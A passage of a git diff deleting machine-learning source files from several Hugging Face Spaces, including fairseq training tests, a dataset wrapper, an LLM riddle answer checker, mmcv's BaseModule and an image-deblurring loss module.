], - ) - generate_main(data_dir) - generate_main( - data_dir, - [ - "--model-overrides", - "{'encoder_layers_to_keep':'0,2','decoder_layers_to_keep':'1'}", - ], - ) - - -class TestStories(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_fconv_self_att_wp(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fconv_self_att_wp") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - config = [ - "--encoder-layers", - "[(128, 3)] * 2", - "--decoder-layers", - "[(128, 3)] * 2", - "--decoder-attention", - "True", - "--encoder-attention", - "False", - "--gated-attention", - "True", - "--self-attention", - "True", - "--project-input", - "True", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--decoder-out-embed-dim", - "8", - "--multihead-self-attention-nheads", - "2", - ] - train_translation_model(data_dir, "fconv_self_att_wp", config) - generate_main(data_dir) - - # fusion model - os.rename( - os.path.join(data_dir, "checkpoint_last.pt"), - os.path.join(data_dir, "pretrained.pt"), - ) - config.extend( - [ - "--pretrained", - "True", - "--pretrained-checkpoint", - os.path.join(data_dir, "pretrained.pt"), - "--save-dir", - os.path.join(data_dir, "fusion_model"), - ] - ) - train_translation_model(data_dir, "fconv_self_att_wp", config) - - -class TestLanguageModeling(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_fconv_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fconv_lm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_language_model( - data_dir, - "fconv_lm", - [ - "--decoder-layers", - "[(850, 3)] * 2 + [(1024,4)]", - "--decoder-embed-dim", - "280", - "--optimizer", - "nag", - "--lr", - "0.1", - ], - ) - eval_lm_main(data_dir) - generate_main( - data_dir, - [ - "--task", - "language_modeling", - "--sample-break-mode", - "eos", - "--tokens-per-sample", - "500", - ], - ) - - def test_transformer_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer_lm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_language_model( - data_dir, - "transformer_lm", - ["--add-bos-token", '--nval', '1'], - run_validation=True, - ) - eval_lm_main(data_dir) - eval_lm_main(data_dir, extra_flags=["--context-window", "25"]) - generate_main( - data_dir, - [ - "--task", - "language_modeling", - "--sample-break-mode", - "eos", - "--tokens-per-sample", - "500", - ], - ) - - def test_transformer_lm_with_adaptive_softmax(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_transformer_lm_with_adaptive_softmax" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_language_model( - data_dir, - "transformer_lm", - [ - "--add-bos-token", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - ], - run_validation=True, - ) - eval_lm_main(data_dir) - generate_main( - data_dir, - [ - "--task", - "language_modeling", - "--sample-break-mode", - "eos", - "--tokens-per-sample", - "500", - ], - ) - - def test_lightconv_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_lightconv_lm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_language_model( - data_dir, - "lightconv_lm", - ["--add-bos-token"], - run_validation=True, - ) - eval_lm_main(data_dir) - generate_main( - data_dir, - [ - "--task", - "language_modeling", - "--sample-break-mode", - "eos", - "--tokens-per-sample", - "500", - ], - ) - - def test_lstm_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_lstm_lm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_language_model( - data_dir, - "lstm_lm", - ["--add-bos-token"], - run_validation=True, - ) - eval_lm_main(data_dir) - generate_main( - data_dir, - [ - "--task", - "language_modeling", - "--sample-break-mode", - "eos", - "--tokens-per-sample", - "500", - ], - ) - - def test_lstm_lm_residuals(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_lstm_lm_residuals") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_language_model( - data_dir, - "lstm_lm", - ["--add-bos-token", "--residuals"], - run_validation=True, - ) - eval_lm_main(data_dir) - generate_main( - data_dir, - [ - "--task", - "language_modeling", - "--sample-break-mode", - "eos", - "--tokens-per-sample", - "500", - ], - ) - - @unittest.skipIf(not has_hf_transformers, "skip test if transformers is missing") - def test_transformer_xl_bptt_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer_xl_bptt_lm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - task_flags = [ - "--user-dir", - "examples/truncated_bptt", - "--task", - "truncated_bptt_lm", - "--batch-size", - "2", - "--tokens-per-sample", - "50", - ] - train_language_model( - data_dir=data_dir, - arch="transformer_xl", - extra_flags=task_flags - + [ - "--n-layer", - "2", - ], - task="truncated_bptt_lm", - run_validation=True, - extra_valid_flags=task_flags, - ) - eval_lm_main(data_dir, extra_flags=task_flags) - # Train with activation offloading - train_language_model( - data_dir=data_dir, - arch="transformer_xl", - extra_flags=task_flags - + [ - "--n-layer", - "2", - "--offload-activations", - ], - task="truncated_bptt_lm", - run_validation=True, - extra_valid_flags=task_flags, - ) - - -class TestMaskedLanguageModel(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_legacy_masked_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_legacy_mlm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_legacy_masked_language_model(data_dir, "masked_lm") - - def test_roberta_masked_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_roberta_mlm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_masked_lm( - data_dir, "roberta_base", extra_flags=["--encoder-layers", "2"] - ) - - def test_roberta_sentence_prediction(self): - num_classes = 3 - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_roberta_head") as data_dir: - create_dummy_roberta_head_data(data_dir, num_classes=num_classes) - preprocess_lm_data(os.path.join(data_dir, "input0")) - preprocess_lm_data(os.path.join(data_dir, "label")) - train_roberta_head(data_dir, "roberta_base", num_classes=num_classes) - - def test_roberta_regression_single(self): - num_classes = 1 - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_roberta_regression_single" - ) as data_dir: - create_dummy_roberta_head_data( - data_dir, num_classes=num_classes, regression=True - ) - preprocess_lm_data(os.path.join(data_dir, "input0")) - train_roberta_head( - data_dir, - "roberta_base", - num_classes=num_classes, - extra_flags=["--regression-target"], - ) - - def test_roberta_regression_multiple(self): - num_classes = 3 - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_roberta_regression_multiple" - ) as data_dir: - create_dummy_roberta_head_data( - data_dir, num_classes=num_classes, regression=True - ) - preprocess_lm_data(os.path.join(data_dir, "input0")) - train_roberta_head( - data_dir, - "roberta_base", - num_classes=num_classes, - extra_flags=["--regression-target"], - ) - - def test_linformer_roberta_masked_lm(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_linformer_roberta_mlm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_masked_lm( - data_dir, - "linformer_roberta_base", - extra_flags=[ - "--user-dir", - "examples/linformer/linformer_src", - "--encoder-layers", - "2", - ], - ) - - def test_linformer_roberta_sentence_prediction(self): - num_classes = 3 - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_linformer_roberta_head") as data_dir: - create_dummy_roberta_head_data(data_dir, num_classes=num_classes) - preprocess_lm_data(os.path.join(data_dir, "input0")) - preprocess_lm_data(os.path.join(data_dir, "label")) - train_roberta_head( - data_dir, - "linformer_roberta_base", - num_classes=num_classes, - extra_flags=["--user-dir", "examples/linformer/linformer_src"], - ) - - def test_linformer_roberta_regression_single(self): - num_classes = 1 - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_linformer_roberta_regression_single" - ) as data_dir: - create_dummy_roberta_head_data( - data_dir, num_classes=num_classes, regression=True - ) - preprocess_lm_data(os.path.join(data_dir, "input0")) - train_roberta_head( - data_dir, - "linformer_roberta_base", - num_classes=num_classes, - extra_flags=[ - "--regression-target", - "--user-dir", - "examples/linformer/linformer_src", - ], - ) - - def test_linformer_roberta_regression_multiple(self): - num_classes = 3 - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_linformer_roberta_regression_multiple" - ) as data_dir: - create_dummy_roberta_head_data( - data_dir, num_classes=num_classes, regression=True - ) - preprocess_lm_data(os.path.join(data_dir, "input0")) - train_roberta_head( - data_dir, - "linformer_roberta_base", - num_classes=num_classes, - extra_flags=[ - "--regression-target", - "--user-dir", - "examples/linformer/linformer_src", - ], - ) - - def _test_pretrained_masked_lm_for_translation(self, learned_pos_emb, encoder_only): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_mlm") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - train_legacy_masked_language_model( - data_dir, - arch="masked_lm", - extra_args=("--encoder-learned-pos",) if learned_pos_emb else (), - ) - with tempfile.TemporaryDirectory( - "test_mlm_translation" - ) as translation_dir: - create_dummy_data(translation_dir) - preprocess_translation_data( - translation_dir, extra_flags=["--joined-dictionary"] - ) - # Train transformer with data_dir/checkpoint_last.pt - train_translation_model( - translation_dir, - arch="transformer_from_pretrained_xlm", - extra_flags=[ - "--decoder-layers", - "1", - "--decoder-embed-dim", - "32", - "--decoder-attention-heads", - "1", - "--decoder-ffn-embed-dim", - "32", - "--encoder-layers", - "1", - "--encoder-embed-dim", - "32", - "--encoder-attention-heads", - "1", - "--encoder-ffn-embed-dim", - "32", - "--pretrained-xlm-checkpoint", - "{}/checkpoint_last.pt".format(data_dir), - "--activation-fn", - "gelu", - "--max-source-positions", - "500", - "--max-target-positions", - "500", - ] - + ( - ["--encoder-learned-pos", "--decoder-learned-pos"] - if learned_pos_emb - else [] - ) - + (["--init-encoder-only"] if encoder_only else []), - task="translation_from_pretrained_xlm", - ) - - def test_pretrained_masked_lm_for_translation_learned_pos_emb(self): - self._test_pretrained_masked_lm_for_translation(True, False) - - def test_pretrained_masked_lm_for_translation_sinusoidal_pos_emb(self): - self._test_pretrained_masked_lm_for_translation(False, False) - - def test_pretrained_masked_lm_for_translation_encoder_only(self): - self._test_pretrained_masked_lm_for_translation(True, True) - - def test_r4f_roberta(self): - num_classes = 3 - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_r4f_roberta_head") as data_dir: - create_dummy_roberta_head_data(data_dir, num_classes=num_classes) - preprocess_lm_data(os.path.join(data_dir, "input0")) - preprocess_lm_data(os.path.join(data_dir, "label")) - train_roberta_head( - data_dir, - "roberta_base", - num_classes=num_classes, - extra_flags=[ - "--user-dir", - "examples/rxf/rxf_src", - "--criterion", - "sentence_prediction_r3f", - "--spectral-norm-classification-head", - ], - ) - - -def train_legacy_masked_language_model(data_dir, arch, extra_args=()): - train_parser = options.get_training_parser() - # TODO: langs should be in and out right? - train_args = options.parse_args_and_arch( - train_parser, - [ - "--task", - "cross_lingual_lm", - data_dir, - "--arch", - arch, - # Optimizer args - "--optimizer", - "adam", - "--lr-scheduler", - "reduce_lr_on_plateau", - "--lr-shrink", - "0.5", - "--lr", - "0.0001", - "--stop-min-lr", - "1e-09", - # dropout, attention args - "--dropout", - "0.1", - "--attention-dropout", - "0.1", - # MLM args - "--criterion", - "legacy_masked_lm_loss", - "--masked-lm-only", - "--monolingual-langs", - "in,out", - "--num-segment", - "5", - # Transformer args: use a small transformer model for fast training - "--encoder-layers", - "1", - "--encoder-embed-dim", - "32", - "--encoder-attention-heads", - "1", - "--encoder-ffn-embed-dim", - "32", - # Other training args - "--max-tokens", - "500", - "--tokens-per-sample", - "500", - "--save-dir", - data_dir, - "--max-epoch", - "1", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--dataset-impl", - "raw", - "--num-workers", - "0", - ] - + list(extra_args), - ) - train.main(train_args) - - -class TestOptimizers(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_optimizers(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_optimizers") as data_dir: - # Use just a bit of data and tiny model to keep this test runtime reasonable - create_dummy_data(data_dir, num_examples=10, maxlen=5) - preprocess_translation_data(data_dir) - optimizers = ["adafactor", "adam", "nag", "adagrad", "sgd", "adadelta"] - last_checkpoint = os.path.join(data_dir, "checkpoint_last.pt") - for optimizer in optimizers: - if os.path.exists(last_checkpoint): - os.remove(last_checkpoint) - train_translation_model( - data_dir, - "lstm", - [ - "--required-batch-size-multiple", - "1", - "--encoder-layers", - "1", - "--encoder-hidden-size", - "32", - "--decoder-layers", - "1", - "--optimizer", - optimizer, - ], - ) - generate_main(data_dir) - - -def read_last_log_entry( - logs: List[logging.LogRecord], logger_name: str -) -> Dict[str, float]: - for x in reversed(logs): - if x.name == logger_name: - return json.loads(x.message) - raise ValueError(f"No entries from {logger_name} found in captured logs") - - -class TestActivationCheckpointing(unittest.TestCase): - base_flags = [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "8", - "--decoder-embed-dim", - "8", - "--restore-file", - "x.pt", - "--log-format", - "json", - "--log-interval", - "1", - "--max-update", - "2", - ] - - def _train(self, data_dir, extra_flags): - with self.assertLogs() as logs: - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - self.base_flags + extra_flags, - run_validation=True, - extra_valid_flags=["--log-format", "json"], - ) - return logs.records - - def test_activation_offloading_does_not_change_metrics(self): - """Neither ----checkpoint-activations nor --offload-activations should change loss""" - with tempfile.TemporaryDirectory("test_transformer_with_act_cpt") as data_dir: - - with self.assertLogs(): - create_dummy_data(data_dir, num_examples=20) - preprocess_translation_data(data_dir) - offload_logs = self._train(data_dir, ["--offload-activations"]) - baseline_logs = self._train(data_dir, []) - - assert len(baseline_logs) == len(offload_logs) - - baseline_valid_stats = read_last_log_entry(baseline_logs, "valid") - offload_valid_stats = read_last_log_entry(offload_logs, "valid") - baseline_train_stats = read_last_log_entry(baseline_logs, "train") - offload_train_stats = read_last_log_entry(offload_logs, "train") - - assert ( - baseline_train_stats["train_loss"] == offload_train_stats["train_loss"] - ) - assert ( - baseline_valid_stats["valid_loss"] == offload_valid_stats["valid_loss"] - ) - - def test_activation_checkpointing_does_not_change_metrics(self): - """--checkpoint-activations should not change loss""" - - with tempfile.TemporaryDirectory("test_transformer_with_act_cpt") as data_dir: - with self.assertLogs(): - create_dummy_data(data_dir, num_examples=20) - preprocess_translation_data(data_dir) - ckpt_logs = self._train(data_dir, ["--checkpoint-activations"]) - baseline_logs = self._train(data_dir, []) - assert len(baseline_logs) == len(ckpt_logs) - - baseline_train_stats = read_last_log_entry(baseline_logs, "train") - ckpt_train_stats = read_last_log_entry(ckpt_logs, "train") - assert baseline_train_stats["train_loss"] == ckpt_train_stats["train_loss"] - - baseline_valid_stats = read_last_log_entry(baseline_logs, "valid") - ckpt_valid_stats = read_last_log_entry(ckpt_logs, "valid") - assert baseline_valid_stats["valid_loss"] == ckpt_valid_stats["valid_loss"] - - -def create_dummy_roberta_head_data( - data_dir, num_examples=100, maxlen=10, num_classes=2, regression=False -): - input_dir = "input0" - - def _create_dummy_data(filename): - random_data = torch.rand(num_examples * maxlen) - input_data = 97 + torch.floor(26 * random_data).int() - if regression: - output_data = torch.rand((num_examples, num_classes)) - else: - output_data = 1 + torch.floor(num_classes * torch.rand(num_examples)).int() - with open(os.path.join(data_dir, input_dir, filename + ".out"), "w") as f_in: - label_filename = filename + ".label" if regression else filename + ".out" - with open(os.path.join(data_dir, "label", label_filename), "w") as f_out: - offset = 0 - for i in range(num_examples): - # write example input - ex_len = random.randint(1, maxlen) - ex_str = " ".join(map(chr, input_data[offset : offset + ex_len])) - print(ex_str, file=f_in) - # write example label - if regression: - class_str = " ".join(map(str, output_data[i].numpy())) - print(class_str, file=f_out) - else: - class_str = "class{}".format(output_data[i]) - print(class_str, file=f_out) - offset += ex_len - - os.mkdir(os.path.join(data_dir, input_dir)) - os.mkdir(os.path.join(data_dir, "label")) - _create_dummy_data("train") - _create_dummy_data("valid") - _create_dummy_data("test") - - -def train_masked_lm(data_dir, arch, extra_flags=None): - train_parser = options.get_training_parser() - train_args = options.parse_args_and_arch( - train_parser, - [ - "--task", - "masked_lm", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "masked_lm", - "--batch-size", - "500", - "--save-dir", - data_dir, - "--max-epoch", - "1", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - ] - + (extra_flags or []), - ) - train.main(train_args) - - -def train_roberta_head(data_dir, arch, num_classes=2, extra_flags=None): - train_parser = options.get_training_parser() - train_args = options.parse_args_and_arch( - train_parser, - [ - "--task", - "sentence_prediction", - data_dir, - "--arch", - arch, - "--encoder-layers", - "2", - "--num-classes", - str(num_classes), - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "sentence_prediction", - "--max-tokens", - "500", - "--max-positions", - "500", - "--batch-size", - "500", - "--save-dir", - data_dir, - "--max-epoch", - "1", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - ] - + (extra_flags or []), - ) - train.main(train_args) - - -def eval_lm_main(data_dir, extra_flags=None): - eval_lm_parser = options.get_eval_lm_parser() - eval_lm_args = options.parse_args_and_arch( - eval_lm_parser, - [ - data_dir, - "--path", - os.path.join(data_dir, "checkpoint_last.pt"), - "--no-progress-bar", - "--num-workers", - "0", - ] - + (extra_flags or []), - ) - eval_lm.main(eval_lm_args) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/data/prepend_dataset.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/data/prepend_dataset.py deleted file mode 100644 index ad74784d2d7920e4a6225282d95543ce16ea50d9..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/data/prepend_dataset.py +++ /dev/null @@ -1,28 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import numpy as np -import torch - -from . import BaseWrapperDataset - - -class PrependDataset(BaseWrapperDataset): - def __init__(self, dataset, prepend_getter, ensure_first_token_is=None): - super().__init__(dataset) - self.prepend_getter = prepend_getter - self.ensure_first_token = ensure_first_token_is - - def __getitem__(self, idx): - item = self.dataset[idx] - is_tuple = isinstance(item, tuple) - src = item[0] if is_tuple else item - - assert self.ensure_first_token is None or src[0] == self.ensure_first_token - prepend_idx = self.prepend_getter(self.dataset, idx) - assert isinstance(prepend_idx, int) - src[0] = prepend_idx - item = tuple((src,) + item[1:]) if is_tuple else src - return item diff --git a/spaces/OpenDILabCommunity/LLMRiddlesChatGLMCN/llmriddles/questions/executor.py b/spaces/OpenDILabCommunity/LLMRiddlesChatGLMCN/llmriddles/questions/executor.py deleted file mode 100644 index 61dafa769808626ef0f179fed4f6bf45979e8252..0000000000000000000000000000000000000000 --- a/spaces/OpenDILabCommunity/LLMRiddlesChatGLMCN/llmriddles/questions/executor.py +++ /dev/null @@ -1,35 +0,0 @@ -from typing import Tuple - -from .question import Question -from ..llms import get_llm_fn - - -class QuestionExecutor: - def __init__(self, question: Question, lang: str = 'cn', llm: str = 'chatgpt', llm_cfgs=None): - self.question = question - self.lang = lang - self.llm = llm - self.llm_cfgs = dict(llm_cfgs or {}) - - @property - def question_text(self): - return self.question.texts[self.lang] - - @property - def question_name(self): - return self.question.names[self.lang] - - def check(self, qs_text: str) -> Tuple[str, bool, str]: - answer_text = get_llm_fn(self.llm)(qs_text, **self.llm_cfgs) - correct, explanation = self.check_answer(qs_text, answer_text) - return answer_text, correct, explanation - - def check_answer(self, user_text: str, answer_text: str) -> Tuple[bool, str]: - correct, explanation = self.question.checker(self.question_text, user_text, answer_text, self.lang) - if explanation is None: - if correct: - explanation = 'LLM的回答满足要求' if self.lang == 'cn' else 'Correct Answer From LLM' - else: - explanation = 'LLM的回答不满足要求' if self.lang == 'cn' else 'Wrong Answer From LLM' - - return correct, explanation diff --git a/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmcv/runner/base_module.py b/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmcv/runner/base_module.py deleted file mode 100644 index 617fad9bb89f10a9a0911d962dfb3bc8f3a3628c..0000000000000000000000000000000000000000 --- a/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmcv/runner/base_module.py +++ /dev/null @@ -1,195 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import copy -import warnings -from abc import ABCMeta -from collections import defaultdict -from logging import FileHandler - -import torch.nn as nn - -from annotator.uniformer.mmcv.runner.dist_utils import master_only -from annotator.uniformer.mmcv.utils.logging import get_logger, logger_initialized, print_log - - -class BaseModule(nn.Module, metaclass=ABCMeta): - """Base module for all modules in openmmlab. - - ``BaseModule`` is a wrapper of ``torch.nn.Module`` with additional - functionality of parameter initialization. Compared with - ``torch.nn.Module``, ``BaseModule`` mainly adds three attributes. - - - ``init_cfg``: the config to control the initialization. - - ``init_weights``: The function of parameter - initialization and recording initialization - information. - - ``_params_init_info``: Used to track the parameter - initialization information. This attribute only - exists during executing the ``init_weights``. - - Args: - init_cfg (dict, optional): Initialization config dict. - """ - - def __init__(self, init_cfg=None): - """Initialize BaseModule, inherited from `torch.nn.Module`""" - - # NOTE init_cfg can be defined in different levels, but init_cfg - # in low levels has a higher priority. - - super(BaseModule, self).__init__() - # define default value of init_cfg instead of hard code - # in init_weights() function - self._is_init = False - - self.init_cfg = copy.deepcopy(init_cfg) - - # Backward compatibility in derived classes - # if pretrained is not None: - # warnings.warn('DeprecationWarning: pretrained is a deprecated \ - # key, please consider using init_cfg') - # self.init_cfg = dict(type='Pretrained', checkpoint=pretrained) - - @property - def is_init(self): - return self._is_init - - def init_weights(self): - """Initialize the weights.""" - - is_top_level_module = False - # check if it is top-level module - if not hasattr(self, '_params_init_info'): - # The `_params_init_info` is used to record the initialization - # information of the parameters - # the key should be the obj:`nn.Parameter` of model and the value - # should be a dict containing - # - init_info (str): The string that describes the initialization. - # - tmp_mean_value (FloatTensor): The mean of the parameter, - # which indicates whether the parameter has been modified. - # this attribute would be deleted after all parameters - # is initialized. - self._params_init_info = defaultdict(dict) - is_top_level_module = True - - # Initialize the `_params_init_info`, - # When detecting the `tmp_mean_value` of - # the corresponding parameter is changed, update related - # initialization information - for name, param in self.named_parameters(): - self._params_init_info[param][ - 'init_info'] = f'The value is the same before and ' \ - f'after calling `init_weights` ' \ - f'of {self.__class__.__name__} ' - self._params_init_info[param][ - 'tmp_mean_value'] = param.data.mean() - - # pass `params_init_info` to all submodules - # All submodules share the same `params_init_info`, - # so it will be updated when parameters are - # modified at any level of the model. - for sub_module in self.modules(): - sub_module._params_init_info = self._params_init_info - - # Get the initialized logger, if not exist, - # create a logger named `mmcv` - logger_names = list(logger_initialized.keys()) - logger_name = logger_names[0] if logger_names else 'mmcv' - - from ..cnn import initialize - from ..cnn.utils.weight_init import update_init_info - module_name = self.__class__.__name__ - if not self._is_init: - if self.init_cfg: - print_log( - f'initialize {module_name} with init_cfg {self.init_cfg}', - logger=logger_name) - initialize(self, self.init_cfg) - if isinstance(self.init_cfg, dict): - # prevent the parameters of - # the pre-trained model - # from being overwritten by - # the `init_weights` - if self.init_cfg['type'] == 'Pretrained': - return - - for m in self.children(): - if hasattr(m, 'init_weights'): - m.init_weights() - # users may overload the `init_weights` - update_init_info( - m, - init_info=f'Initialized by ' - f'user-defined `init_weights`' - f' in {m.__class__.__name__} ') - - self._is_init = True - else: - warnings.warn(f'init_weights of {self.__class__.__name__} has ' - f'been called more than once.') - - if is_top_level_module: - self._dump_init_info(logger_name) - - for sub_module in self.modules(): - del sub_module._params_init_info - - @master_only - def _dump_init_info(self, logger_name): - """Dump the initialization information to a file named - `initialization.log.json` in workdir. - - Args: - logger_name (str): The name of logger. - """ - - logger = get_logger(logger_name) - - with_file_handler = False - # dump the information to the logger file if there is a `FileHandler` - for handler in logger.handlers: - if isinstance(handler, FileHandler): - handler.stream.write( - 'Name of parameter - Initialization information\n') - for name, param in self.named_parameters(): - handler.stream.write( - f'\n{name} - {param.shape}: ' - f"\n{self._params_init_info[param]['init_info']} \n") - handler.stream.flush() - with_file_handler = True - if not with_file_handler: - for name, param in self.named_parameters(): - print_log( - f'\n{name} - {param.shape}: ' - f"\n{self._params_init_info[param]['init_info']} \n ", - logger=logger_name) - - def __repr__(self): - s = super().__repr__() - if self.init_cfg: - s += f'\ninit_cfg={self.init_cfg}' - return s - - -class Sequential(BaseModule, nn.Sequential): - """Sequential module in openmmlab. - - Args: - init_cfg (dict, optional): Initialization config dict. - """ - - def __init__(self, *args, init_cfg=None): - BaseModule.__init__(self, init_cfg) - nn.Sequential.__init__(self, *args) - - -class ModuleList(BaseModule, nn.ModuleList): - """ModuleList in openmmlab. - - Args: - modules (iterable, optional): an iterable of modules to add. - init_cfg (dict, optional): Initialization config dict. - """ - - def __init__(self, modules=None, init_cfg=None): - BaseModule.__init__(self, init_cfg) - nn.ModuleList.__init__(self, modules) diff --git a/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmseg/models/necks/__init__.py b/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmseg/models/necks/__init__.py deleted file mode 100644 index 9b9d3d5b3fe80247642d962edd6fb787537d01d6..0000000000000000000000000000000000000000 --- a/spaces/PAIR/Text2Video-Zero/annotator/uniformer/mmseg/models/necks/__init__.py +++ /dev/null @@ -1,4 +0,0 @@ -from .fpn import FPN -from .multilevel_neck import MultiLevelNeck - -__all__ = ['FPN', 'MultiLevelNeck'] diff --git a/spaces/PSLD/PSLD/diffusion-posterior-sampling/bkse/models/losses/dsd_loss.py b/spaces/PSLD/PSLD/diffusion-posterior-sampling/bkse/models/losses/dsd_loss.py deleted file mode 100644 index 9cf4660dc5f3d088bcf926866914ca0790348c5e..0000000000000000000000000000000000000000 --- a/spaces/PSLD/PSLD/diffusion-posterior-sampling/bkse/models/losses/dsd_loss.py +++ /dev/null @@ -1,129 +0,0 @@ -import torch -from models.dsd.bicubic import BicubicDownSample -from models.kernel_encoding.kernel_wizard import KernelWizard -from models.losses.ssim_loss import SSIM - - -class LossBuilder(torch.nn.Module): - def __init__(self, ref_im, opt): - super(LossBuilder, self).__init__() - assert ref_im.shape[2] == ref_im.shape[3] - self.ref_im = ref_im - loss_str = opt["loss_str"] - self.parsed_loss = [loss_term.split("*") for loss_term in loss_str.split("+")] - self.eps = opt["eps"] - - self.ssim = SSIM().cuda() - - self.D = KernelWizard(opt["KernelWizard"]).cuda() - self.D.load_state_dict(torch.load(opt["KernelWizard"]["pretrained"])) - for v in self.D.parameters(): - v.requires_grad = False - - # Takes a list of tensors, flattens them, and concatenates them into a vector - # Used to calculate euclidian distance between lists of tensors - def flatcat(self, l): - l = l if (isinstance(l, list)) else [l] - return torch.cat([x.flatten() for x in l], dim=0) - - def _loss_l2(self, gen_im_lr, ref_im, **kwargs): - return (gen_im_lr - ref_im).pow(2).mean((1, 2, 3)).clamp(min=self.eps).sum() - - def _loss_l1(self, gen_im_lr, ref_im, **kwargs): - return 10 * ((gen_im_lr - ref_im).abs().mean((1, 2, 3)).clamp(min=self.eps).sum()) - - # Uses geodesic distance on sphere to sum pairwise distances of the 18 vectors - def _loss_geocross(self, latent, **kwargs): - pass - - -class LossBuilderStyleGAN(LossBuilder): - def __init__(self, ref_im, opt): - super(LossBuilderStyleGAN, self).__init__(ref_im, opt) - im_size = ref_im.shape[2] - factor = opt["output_size"] // im_size - assert im_size * factor == opt["output_size"] - self.bicub = BicubicDownSample(factor=factor) - - # Uses geodesic distance on sphere to sum pairwise distances of the 18 vectors - def _loss_geocross(self, latent, **kwargs): - if latent.shape[1] == 1: - return 0 - else: - X = latent.view(-1, 1, 18, 512) - Y = latent.view(-1, 18, 1, 512) - A = ((X - Y).pow(2).sum(-1) + 1e-9).sqrt() - B = ((X + Y).pow(2).sum(-1) + 1e-9).sqrt() - D = 2 * torch.atan2(A, B) - D = ((D.pow(2) * 512).mean((1, 2)) / 8.0).sum() - return D - - def forward(self, latent, gen_im, kernel, step): - var_dict = { - "latent": latent, - "gen_im_lr": self.D.adaptKernel(self.bicub(gen_im), kernel), - "ref_im": self.ref_im, - } - loss = 0 - loss_fun_dict = { - "L2": self._loss_l2, - "L1": self._loss_l1, - "GEOCROSS": self._loss_geocross, - } - losses = {} - - for weight, loss_type in self.parsed_loss: - tmp_loss = loss_fun_dict[loss_type](**var_dict) - losses[loss_type] = tmp_loss - loss += float(weight) * tmp_loss - loss += 5e-5 * torch.norm(kernel) - losses["Norm"] = torch.norm(kernel) - - return loss, losses - - def get_blur_img(self, sharp_img, kernel): - return self.D.adaptKernel(self.bicub(sharp_img), kernel).cpu().detach().clamp(0, 1) - - -class LossBuilderStyleGAN2(LossBuilder): - def __init__(self, ref_im, opt): - super(LossBuilderStyleGAN2, self).__init__(ref_im, opt) - - # Uses geodesic distance on sphere to sum pairwise distances of the 18 vectors - def _loss_geocross(self, latent, 